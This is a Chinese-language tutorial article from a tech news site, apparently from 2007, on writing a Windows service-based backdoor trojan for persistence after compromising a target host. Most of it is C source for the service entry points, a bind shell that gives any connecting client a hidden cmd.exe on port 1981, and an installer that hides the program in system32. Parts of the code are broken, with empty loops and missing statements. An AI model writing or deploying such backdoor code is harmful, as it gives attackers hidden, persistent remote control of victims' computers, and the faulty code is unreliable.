黑客技巧之自己来做服务级的木马后门

作者: hackmaster　出处:赛迪网　 ( ) 砖 ( ) 好评论 ( ) 条　进入论坛

更新时间：2007-01-25 11:15
关键词：木马服务自己技巧黑客 NULL 我们控制程序一个
阅读提示：以往大多数的木马/后门都是通过修改系统ini文件（比如Win.ini，System.ini）或修改注册表的RUN值来实现自启动的，还有更简单的是修改Autobat.exe,但随着网络用户安全意识的提高，为了适应新时代木马后门技术的发展要求，一种利用Windows NT/2000/XP系统服务的后门产生了，现在的WinShell，WinEggDrop等众人皆知的Telnte扩展后门都利用了这种方式。

以往大多数的木马/后门都是通过修改系统ini文件（比如Win.ini，System.ini）或修改注册表的RUN值来实现自启动的，还有更简单的是修改Autobat.exe（老大，地球不适合你，你还是回火星吧），但随着网络用户安全意识的提高，连我家旁边卖茶叶蛋的大妈都知道如何对付这些老方法了。为了适应新时代木马后门技术的发展要求，一种利用Windows NT/2000/XP系统服务的后门产生了，现在的WinShell，WinEggDrop等众人皆知的Telnte扩展后门都利用了这种方式。相信很多小菜们对这种后门技术并不了解，所以，我在这里就充个大头，给大家传授教业解解惑吧（受害MM目光呆滞，一脸绝望：有了你们这帮人，天下什么时候才能“无贼”啊？）。

前置原理

Windows NT/2000/XP提供的服务既可以指一种特定的Win32进程，也可以指内核模式的设备驱动程序。操作系统的一个称为“服务控制管理器SCM”的组件被用来装载和控制这两种类型的服务。当然，我们说的服务，是指的前者，即我们可以利用的服务是一个在Windows NT/2000/XP下执行的程序。当我们打开“控制面板管理工具服务”，就可以看到右边有一堆的服务。每一行指定了一个特定服务的属性，包括名称、描述、状态、启动类型、登录方式等。

“服务”本身是Windows NT/2000/XP下客户／服务器软件的合理选择，因为它提供了像Unix下后台程序Daemons（守护进程）的等价物，而且使得创建能够代表权限低的用户进行权限高的操作的程序成为可能。像我们熟知的RPC服务，病毒扫描程序以及备份程序都是很适合作为服务进程。

服务能被我们利用作为后门实现自启动，是因为它有三个很重要的特性：

1. 服务可以被指定为自启动，在利用传统的注册表修改RUN键值，添加ini自启动项等方法的基础上又多了一种选择。

2. 服务可以在任何用户登录前开始运行，我们可以在服务启动时加入杀防火墙的代码。

3. 服务是运行在后台的，如果不注意，天知道什么时候被人家装了后门。

服务大都是由服务控制程序在注册表中维护的一个信息数据库来管理的，每个服务在HKEY_LOCAL_MACHINESystemCurrentControlSetServices中都可以找到相应的一个关键项。服务区别于一般Windows NT/2000/XP程序的主要之处在于服务与服务控制管理程序的合作，在后面的编程中我们将会体会到这一点。

编程实现

一个完整的服务分为安装服务程序，主体服务程序和卸载服务程序。我们先来写服务的主体部分，示例代码如下：

Code:
void main()
{
SERVICE_TABLE_ENTRY ServiceTable[] = 
{
{"scuhkr", BDServiceMain},
{NULL, NULL} //"哨兵"
};
//连接到服务控制管理器
StartServiceCtrlDispatcher(ServiceTable);
}

上面代码中，我们先给出了一个SERVICE_TABLE_ENTRY结构数组，每个成员描述了调用进程提供的服务，这里我们只安装了一个服务名为Scuhkr的服务，后面的BDServiceMain()我们称之为服务主函数，通过回调该函数提供了服务入口地址，它原形的参数必须定义成如下形式：

VOID WINAPI BDServiceMain(
DWORD dwArgc, //lpszArgv参数个数
LPTSTR* lpszArgv //该数组第一个的参数指定了服务名，可以在后面被
              StartService()来调用
);

SERVICE_TABLE_ENTRY结构数组要求最后一个成员组都为NULL，我们称之为“哨兵”（所有值都为NULL），表示该服务表末尾。一个服务启动后，马上调用StartServiceCtrlDispatcher()通知服务控制程序服务正在执行，并提供服务函数的地址。StartServiceCtrlDispatcher()只需要一个至少有两SERVICE_TABLE_ENTRY结构的数组，它为每个服务启动一个线程，一直等到它们结束才返回。

本程序只提供了一个服务函数BDServiceMain()，下面我们来下完成这个函数的功能，示例代码如下：

void WINAPI BDServiceMain(DWORD dwArgc, LPTSTR *lpszArgv)
{
DWORD dwThreadId; //存放线程ID

//通过RegisterServiceCtrlHandler()与服务控制程序建立一个通信的协议。
//BDHandler()是我们的服务控制程序，它被可以被用来开始，暂停，恢复，停止服务等控制操作
if (!(ServiceStatusHandle = RegisterServiceCtrlHandler("scuhkr",
              BDHandler))) 
return;

//表示该服务私有
ServiceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
//初始化服务，正在开始
ServiceStatus.dwCurrentState = SERVICE_START_PENDING; //
//服务可以接受的请求，这里我们只接受停止服务请求和暂停恢复请求
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP
              | SERVICE_ACCEPT_PAUSE_CONTINUE;
//下面几个一般我们不大关心，全为0
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwWin32ExitCode     = 0;
ServiceStatus.dwCheckPoint         = 0;
ServiceStatus.dwWaitHint         = 0;
//必须调用SetServiceStatus()来响应服务控制程序的每次请求通知
SetServiceStatus(ServiceStatusHandle, &ServiceStatus);

//开始运行服务
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint   = 0;
ServiceStatus.dwWaitHint   = 0;

SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
//我们用一个事件对象来控制服务的同步
if (!(hEvent=CreateEvent(NULL, FALSE, FALSE, NULL)))
return;

ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwCheckPoint   = 0;
ServiceStatus.dwWaitHint   = 0;

SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
//开线程来启动我们的后门程序
if (!(hThread=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MainFn, (LPVOID)0, 0, 
&dwThreadId)))


ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint   = 0;
ServiceStatus.dwWaitHint   = 0;

WaitForSingleObject(hEvent, INFINITE);

CloseHandle(hThread);
ExitThread(dwThreadId);
CloseHandle(hEvent);

return;
}

上面我们调用了一个服务控制函数BDHandler()，由于只是简单的介绍，我们这里只处理服务停止控制请求的情况，其它暂停、恢复等功能，读者可以自己完善。下面是对BDHandler()的实现代码：

void WINAPI BDHandler(DWORD dwControl)
{
switch(dwControl)
{
case SERVICE_CONTROL_STOP:
//等待后门程序的停止
ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
ServiceStatus.dwCheckPoint   = 0;
ServiceStatus.dwWaitHint   = 0;

SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
//设时间为激发状态，等待下一个事件的到来
SetEvent(hEvent);

ServiceStatus.dwCurrentState = SERVICE_STOP;
ServiceStatus.dwCheckPoint   = 0;
ServiceStatus.dwWaitHint   = 0;
//停止
SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
break;

default:
break;
}
}

服务控制函数搞定了，下面就剩下主体的后门函数了。本程序借用了许多前辈翻写过了无数次的后门程序，通过开一个端口监听，允许任何与该端口连接的远程主机建立信任连接，并提供一个交互式Shell。为了代码清晰，我去掉了错误检查，整个过程很简单，也就不多解释了，代码如下：

DWORD WINAPI MainFn(LPVOID lpParam)
{
WSADATA WSAData;
struct sockaddr_in RemoteAddr;
DWORD dwThreadIdA,dwThreadIdB,dwThreadParam=0;
PROCESS_INFORMATION processinfo;
STARTUPINFO startinfo;

WSAStartup(MAKEWORD(2,2),&WSAData);
ServerSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
RemoteAddr.sin_family = AF_INET;
RemoteAddr.sin_port = htons(1981); //监听端口
RemoteAddr.sin_addr.S_un.S_addr = INADDR_ANY;

bind(ServerSocket,(LPSOCKADDR)&RemoteAddr,sizeof(RemoteAddr));
listen(ServerSocket, 2);

varA = 0;
varB = 0;
CreateThread(NULL, 0, ThreadFuncA, NULL, 0, &dwThreadIdA);
CreateThread(NULL, 0, ThreadFuncB, NULL, 0, &dwThreadIdB);

dowhile((varA || varB) == 0);

GetStartupInfo(&startinfo);
startinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
startinfo.hStdInput = hReadPipe;
startinfo.hStdError = hWritePipe;
startinfo.hStdOutput = hWritePipe;
startinfo.wShowWindow = SW_HIDE; //隐藏控制台窗口

char szAPP[256];
GetSystemDirectory(szAPP,MAX_PATH+1);

strcat(szAPP,"cmd.exe");
//开cmd进程
if (CreateProcess(szAPP, NULL, NULL, NULL, TRUE, 0, 
  NULL, NULL, &startinfo, &processinfo) == 0)
{
  printf ("CreateProcess Error!n");
  return -1;
}

while (true) 
{
ClientSocket = accept(ServerSocket, NULL, NULL);
Sleep(250);
}

return 0;
}

//线程函数A, 通过管道A来从控制端接受输入，然后写入被控制端输入端
DWORD WINAPI ThreadFuncA( LPVOID lpParam )
{
SECURITY_ATTRIBUTES pipeattr;
DWORD nByteToWrite, nByteWritten;
char recv_buff[1024];

pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
pipeattr.lpSecurityDescriptor = NULL;
pipeattr.bInheritHandle = TRUE;
CreatePipe(&hReadPipe,
&hWriteFile,
&pipeattr,
0);

varA = 1;
while(true)
{
Sleep(250);
nByteToWrite = recv(ClientSocket,
  recv_buff,
  1024,
  0);
printf("%sn", recv_buff);
WriteFile(hWriteFile,
  recv_buff,
  nByteToWrite,
  &nByteWritten,
  NULL);
}
return 0;
}

//线程函数B, 通过管道B来从被控制端接受输入，然后写到控制端输出端
DWORD WINAPI ThreadFuncB( LPVOID lpParam )
{
SECURITY_ATTRIBUTES pipeattr;
DWORD len;
char send_buff[25000];

pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
pipeattr.lpSecurityDescriptor = NULL;
pipeattr.bInheritHandle = TRUE;

CreatePipe(&hReadFile,
&hWritePipe,
&pipeattr,
0);

varB = 1;
while (true)

return 0;
}

现在我们成功入侵目标主机，在拍屁股走人之前，怎么也要留个后门，方便下次继续。那后门怎么留？我们上面写的都是主体部分，还没安装呢。安装服务的部分其实很简单，示例代码如下：

// InstallService.cpp
void main()
{
SC_HANDLE hSCManager = NULL, //服务控制管理器句柄
hService = NULL;   //服务句柄
char szSysPath[MAX_PATH]=, 
szExePath[MAX_PATH]=;   //我们要把我们后台执行的程序放在这里，一般就是在admin$system32里，
隐蔽性高

if ((hSCManager = OpenSCManager(NULL, //NULL表明是本地主机 
NULL, // 要打开的服务控制管理数据库，默认为空
SC_MANAGER_CREATE_SERVICE//创建权限
))==NULL)
{
pirntf("OpenSCManager failedn");
return;
}

GetSystemDirectory(szSysPath, MAX_PATH); //获得系统目录，也就是system32里面，隐蔽起来
strcpy(szExePath, szSysPath);
strcat(szExePath, "scuhkr.exe"); //应用程序绝对路径

if ((hService=CreateService(hSCManager, //指向服务控制管理数据库的句柄
    "scuhkr",   //服务名
    "scuhkr backdoor service", //显示用的服务名
    SERVICE_ALL_ACCESS, //所有访问权限
    SERVICE_WIN32_OWN_PROCESS, //私有类型
    SERVICE_DEMAND_START, //自启动类型     SERVICE_ERROR_IGNORE, //忽略错误处理
    szExePath, //应用程序路径
    NULL, 
    NULL, 
    NULL,
    NULL,
    NULL)) == NULL)
{
printf("%dn", GetLastError());
  return;
}

//让服务马上运行。万一是个服务器，10天半个月不重启，岂不是没搞头？
if(StartService(hService, 0, NULL) == FALSE)
{ 
printf("StartService failed: %dn", GetLastError());
return;
}
printf(“Install service successfullyn ”);
CloseServiceHandle(hService); //关闭服务句柄
CloseServiceHandle(hSCManager); //关闭服务管理数据库句柄
}

一切都写完了，我们在本机上测试一下，先把前面的服务主体程序Scuhkr.exe拷贝到系统目录system32下（如果需要程序自动实现自拷贝的，可以通过CopyFile()来实现，具体怎么做偶就不讲了，相信聪明的你三下五除二就能搞定，确实不行就去找WinShell的源代码来看看吧），然后执行InstallServcie.exe。为了看我们是否安装成功，有两个办法，一是通过控制面板->管理工具->服务，二是利用控制台下系统自带的Sc.exe工具，比如：“sc.exe qc rpcss”。看到安装服务的信息了？是不是很简单呢！

责任编辑: 雪花(TEL:（010）68476636-8008)

滚动新闻　术语词典　问题悬赏

发表

共条查看

评价

叫个好

拍一砖

相关

博客

帖子

·从程序员到软件设计师的过程
·对程序员职业规划的一些看法
·程序员职业规划
·众名家谈程序员职业规划
·[伊达原创]Linux环境下配置同步更新的SV..

·真正“100M独享”电信服务器、“百M独享..
·华为s6506访问控制列表问题
·浙江腾佑科技服务器租用ＱＱ４２４７１..
·东方标准－病毒防护技巧－录屏版－高显..
·东方标准－病毒防护技巧－高显嵩主讲

我也说两句

中国领先的 IT 技术网站 ·
技术成就梦想

·教你使用Anti ARP Sniffer查找ARP..
·网络嗅探教程：使用Sniffer Pro监..

· 教你使用Anti ARP Snif..
· 网络嗅探教程：使用Sni..
· 时代亿信企业级信息安..
· ISA Server、虚拟机、..
· Windows年底再现图片漏..
· MBSA本地审核策略建议

· 企业局域网安全访问控..
· 常见病毒手工清除方法..
· 网络技术经典基础教程
· 真正“100M独享”电信..
· 华为s6506访问控制列表..
· 浙江腾佑科技服务器租..

排行榜

·ARP攻击防范与解决方案 (查看73538次)
·ARP病毒攻击技术分析与防御 (查看30376次)
·远程控制软件VNC教程和对内网机.. (查看27839次)
·江民“熊猫烧香”专杀工具 (查看27426次)
·ARP病毒解决办法 (查看23403次)

·ARP攻击防范与解决方案 (529个砖)
·51CTO安全专访：信息安全的基石—安全操作系统 (443个砖)
·51CTO调查：七成技术人员不相信“可杀未知病毒” (431个砖)
·病毒查杀专题 (168个砖)
·51CTO专访：优秀杀毒产品应该具备的特征 (163个砖)

·清除流氓软件——51CTO特别专题 (701个好)
·ARP攻击防范与解决方案 (498个好)
·51CTO调查：七成技术人员不相信“可杀未知病毒” (483个好)
·51CTO安全专访：信息安全的基石—安全操作系统 (460个好)
·深入了解PGP加密技术 (182个好)

·网络技术经典基础教程 (09月)
·CISSP认证成长之路 (09月)
·国内安全厂商新排名出炉谁是你心中的第一 (08月)
·垃圾邮件新对策：远程定制托管服务 (08月)
·冷眼旁观2007年半年安全报告 (07月)

·国庆充电之IT培训认证
·51CTO主编推荐经典专题

· 51CTO“十·一”特别专..
· 对应需求如何选择最合..
· SPEC：AMD四核浮点性能..
· FB-DIMM、RDDR3谁是服..
· Avaya股东批准私募基金..
· 未来游戏设计将要面临..
· 微软发布全新FTP7.0
· 网络嗅探教程：用Sniff..

· 能够改变IT格局的五大..
· 微软统一沟通系列视频..
· 专家教你理解ARP欺骗攻..
· 微软屈从用户PC厂商压..
· 企业如何对付DDoS攻击 ..
· 思科称三年后网真系统..
· 北京歌华出现网络故障 ..
· 苹果与黑客大斗法破解..

订阅技术快讯

电子杂志下载

名称：网络安全精品应用黄皮书
简介：《2007精品网络安全黄皮书》包括了9个大类24个小类， 800余篇文章，内容包含了熊猫烧香病毒、DDOS攻击、ARP病等热点问题的介绍及解决方案。从病毒查杀、防范、系统、数据等各方面的安全设置到黑客技术的了解、防范，涉及到了安全应用的全部领域, 由浅至深内容全面。

名称：Vista精品应用黄皮书
简介：《Vista精品应用黄皮书》囊括了Vista的各方面内容。此次的精简版，是将里面的内容做了提取，便于用户下载和使用。内容包含了各种Vista的安装与实施、技巧与解析以及各种Vista相关学习文档和相关软件的安全下载。该电子书是了解和应用Vista人员必备的工具手册，并且也是第一本

名称：2006中国IT论坛精品集合
简介：本书由“51CTO论坛推广联盟”制作完成。书中所有内容均来自各联盟成员的论坛（网站）。制作本书的目的是为了集中大家的优势资源，将更多更精彩的内容带给广大技术爱好者。本书是联盟成立以来制作的第一本书。

专题

最多好

最多砖

DB2 9技术资源中.. 推荐阅读
·DB2 Viper快速入门 ·DB2 9数据库的镜像分割与..	·将XML应用程序从DB2 8.x.. ·DB2 9中的pureXML：如何..
51CTO.com编辑部.. 推荐阅读
·服务器中的“傻瓜机”在.. ·盖茨也喜欢登录Youtube看..	· ·

张振伦的博客
·拯救系统管理员 ·美国选民：我为什么选布什	·VMware公司中文命名挑战赛 ·我们真缺乏创新吗?
梁林的博客
·J0ker的CISSP之路：复习-.. ·J0ker的CISSP之路:复习-I..	·9月第3周安全回顾内网安.. ·教你几招识别和防御Web网..

组网建网	安全频道
· NGN:下一代网络 · 网络访问中断大排查 · FTTx光纤接入	· 教你使用Anti ARP Sniff.. · 网络嗅探教程：使用Snif.. · 常见病毒手工清除方法大..
编程频道	前沿技术
· C++是垃圾语言？！ · 2007年IT界七大抄袭事件 · Java实用开发全集	· 解析Ajax开发框架走进A.. · 基于Google Maps与Ajax.. · 基于Google Maps与Ajax..
操作系统	服务器
· 热门 IT 培训认证官方资.. · Ubuntu 中文开源频道 · Solaris基础知识入门	· 费力不讨好数据中心主.. · AMD Phenom三核处理器解.. · 51CTO主编推荐经典专题
数据库	存储频道
· 甲骨文Oracle 11g正式发.. · Oracle数据库开发之PL/S.. · Oracle数据库开发基础教..	· 存储2006，一个并购的大.. · IDC宣布浪潮蝉联存储市.. · 双机热备技术